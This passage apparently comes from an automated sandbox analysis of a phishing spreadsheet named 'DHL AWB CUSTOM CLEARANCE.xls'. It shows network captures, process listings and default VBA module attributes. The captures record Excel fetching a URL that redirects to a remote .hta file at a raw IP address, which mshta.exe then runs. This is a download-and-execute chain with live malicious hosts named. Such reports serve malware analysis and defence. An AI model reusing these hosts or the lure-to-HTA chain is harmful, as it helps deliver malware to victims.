                                                Jan 14, 2025 19:16:09.728131056 CET224INData Raw: 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25
                                                Data Ascii: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0
                                                Jan 14, 2025 19:16:09.732949972 CET1236INData Raw: 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                                                Data Ascii: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%69%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.246330514.103.79.104438548C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                TimestampBytes transferredDirectionData
                                                2025-01-14 18:16:08 UTC271OUTGET /hANTnNH4?&astrology=wet%20&abolishment=scintillating&pavement HTTP/1.1
                                                Accept: */*
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: s.deemos.com
                                                Connection: Keep-Alive
                                                2025-01-14 18:16:09 UTC457INHTTP/1.1 302 Found
                                                Date: Tue, 14 Jan 2025 18:16:09 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 98
                                                Connection: close
                                                X-DNS-Prefetch-Control: off
                                                X-Frame-Options: SAMEORIGIN
                                                Strict-Transport-Security: max-age=15724800; includeSubDomains
                                                X-Download-Options: noopen
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 1; mode=block
                                                Location: http://131.226.2.34/xampp/meno/clearpciturewithhersheisverybeautifulgirl.hta
                                                Vary: Accept
                                                2025-01-14 18:16:09 UTC98INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 33 31 2e 32 32 36 2e 32 2e 33 34 2f 78 61 6d 70 70 2f 6d 65 6e 6f 2f 63 6c 65 61 72 70 63 69 74 75 72 65 77 69 74 68 68 65 72 73 68 65 69 73 76 65 72 79 62 65 61 75 74 69 66 75 6c 67 69 72 6c 2e 68 74 61
                                                Data Ascii: Found. Redirecting to http://131.226.2.34/xampp/meno/clearpciturewithhersheisverybeautifulgirl.hta


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.246330913.107.253.454438548C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                TimestampBytes transferredDirectionData
                                                2025-01-14 18:16:24 UTC214OUTGET /rules/rule170146v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
                                                Host: otelrules.svc.static.microsoft
                                                2025-01-14 18:16:25 UTC471INHTTP/1.1 200 OK
                                                Date: Tue, 14 Jan 2025 18:16:24 GMT
                                                Content-Type: text/xml
                                                Content-Length: 461
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Thu, 14 Nov 2024 16:14:57 GMT
                                                ETag: "0x8DD04C77BDE7614"
                                                x-ms-request-id: d411a9fe-f01e-0000-46b0-66193e000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20250114T181624Z-r1fc5bf4d66x5bv5hC1MNZan0s00000021g0000000003tw6
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_MISS
                                                Accept-Ranges: bytes
                                                2025-01-14 18:16:25 UTC461INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 37 30 31 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 47 72 61 70 68 69 63 73 2e 45 78 70 6f 72 74 42 75 6c 6c 65 74 42 6c 69 70 43 45 78 63 65 70 74 69 6f 6e 22 20 41 54 54 3d 22 63 66 63 66 64 62 39 31 63 36 38 63 34 33 32 39 62 62 38 62 37 63 62 37 62 61 62 62 33 63 66 37 2d 65 30 38 32 63 32 66 32 2d 65 66 31 64 2d 34 32 37 61 2d 61 63 34 64 2d 62 30 62 37 30 30 61 66 65 37 61 37 2d 37 36 35 35 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 34 38 39 66 34 22 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="170146" V="0" DC="SM" EN="Office.Graphics.ExportBulletBlipCException" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="489f4"


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:13:15:16
                                                Start date:14/01/2025
                                                Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                Imagebase:0x7ff7a90e0000
                                                File size:70'082'712 bytes
                                                MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:8
                                                Start time:13:16:08
                                                Start date:14/01/2025
                                                Path:C:\Windows\System32\mshta.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                Imagebase:0x7ff7b8a10000
                                                File size:32'768 bytes
                                                MD5 hash:36D15DDE6D71802D9588CC0D48EDF8EA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:9
                                                Start time:13:16:17
                                                Start date:14/01/2025
                                                Path:C:\Windows\splwow64.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\splwow64.exe 12288
                                                Imagebase:0x7ff79c5c0000
                                                File size:192'512 bytes
                                                MD5 hash:AF4A7EBF6114EE9E6FBCC910EC3C96E6
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:12
                                                Start time:13:16:33
                                                Start date:14/01/2025
                                                Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\DHL AWB CUSTOM CLEARANCE.xls"
                                                Imagebase:0x7ff7a90e0000
                                                File size:70'082'712 bytes
                                                MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Call Graph

                                                • Entrypoint
                                                • Decryption Function
                                                • Executed
                                                • Not Executed
                                                • Show Help
                                                callgraph 1 Error: Graph is empty

                                                Module: Sheet1

                                                Declaration
                                                LineContent
                                                1

                                                Attribute VB_Name = "Sheet1"

                                                2

                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                3

                                                Attribute VB_GlobalNameSpace = False

                                                4

                                                Attribute VB_Creatable = False

                                                5

                                                Attribute VB_PredeclaredId = True

                                                6

                                                Attribute VB_Exposed = True

                                                7

                                                Attribute VB_TemplateDerived = False

                                                8

                                                Attribute VB_Customizable = True

                                                Module: Sheet2

                                                Declaration
                                                LineContent
                                                1

                                                Attribute VB_Name = "Sheet2"

                                                2

                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                3

                                                Attribute VB_GlobalNameSpace = False

                                                4

                                                Attribute VB_Creatable = False

                                                5

                                                Attribute VB_PredeclaredId = True

                                                6

                                                Attribute VB_Exposed = True

                                                7

                                                Attribute VB_TemplateDerived = False

                                                8

                                                Attribute VB_Customizable = True

                                                Module: Sheet3

                                                Declaration
                                                LineContent
                                                1

                                                Attribute VB_Name = "Sheet3"

                                                2

                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                3

                                                Attribute VB_GlobalNameSpace = False

                                                4

                                                Attribute VB_Creatable = False

                                                5

                                                Attribute VB_PredeclaredId = True

                                                6

                                                Attribute VB_Exposed = True

                                                7

                                                Attribute VB_TemplateDerived = False

                                                8

                                                Attribute VB_Customizable = True

                                                Module: ThisWorkbook

                                                Declaration
                                                LineContent
                                                1

                                                Attribute VB_Name = "ThisWorkbook"

                                                2

                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                3

                                                Attribute VB_GlobalNameSpace = False

                                                4

                                                Attribute VB_Creatable = False

                                                5

                                                Attribute VB_PredeclaredId = True

                                                6

                                                Attribute VB_Exposed = True

                                                7

                                                Attribute VB_TemplateDerived = False

                                                8

                                                Attribute VB_Customizable = True

                                                Reset < >